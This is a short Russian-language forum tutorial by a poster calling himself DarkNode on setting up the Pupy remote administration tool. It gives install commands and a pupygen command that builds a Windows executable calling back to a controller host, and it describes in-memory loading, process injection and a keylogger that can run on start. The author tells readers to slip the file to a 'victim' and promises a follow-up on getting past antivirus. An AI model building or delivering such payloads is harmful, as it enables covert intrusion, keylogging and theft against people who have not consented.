PUPY Remote Administration Tool (RAT)

Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом.

Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти.
Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ...

После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework ,как интерфейсом так и модулями которые разработчики вложили в сей продукт.

Я считаю что его можно отлично использовать для:

  • security research
  • обучения
  • пентестинга
  • администрирования

И так давайте все же познакомимся с ним по ближе.
Создаем PAYLOAD
Ну для начала скачаем все же и установим зависимости(я делаk на Kali Linux):

Код:

git clone https://github.com/n1nj4sec/pupy.git pupy
cd pupy
git submodule update --init --depth 1 pupy/payload_templates
git submodule init
git submodule update
pip install -r requirements.txt


Дальше идем в папку pupy и там нас пока что интересуют только два файла:
pupygen.py -сам билдер(генератор) так сказать и pupysh.py сама серверная часть,консоль управления.


Я попытаюсь кратко описать функционал,иначе статья будет очень длинная.

Одна из фишек этой тулзы это транспорты и скриплеты которые позволяют выбирать тип шифрования трафика ,а скриплеты позволяют запустить какой то модуль сразу же при старте вредоноса(например кейлоггер) Посмотреть список скриплетов и транспортов можно командой

Код:

python pupygen.py -l


Cгенерировать бинарник под виндоус систему можно следующей командой:

./pupygen.py -f exe_x86 -o ~/DarkNode.exe connect --host 192.168.137.137:443


После этого парим жертве(правда он скорее всего спалится антивирусом,но в следующих статья я научу его вас обходить,это ознакомительная часть)

Дальше все очень похоже на метерпретер сессию метаслоита:
Открываем сессию командой

Код:

session -i 1
пользуемся командами
help
list_modules
run module_name -h

 

 

 


Спасибо за внимания.C Вами был DarkNode)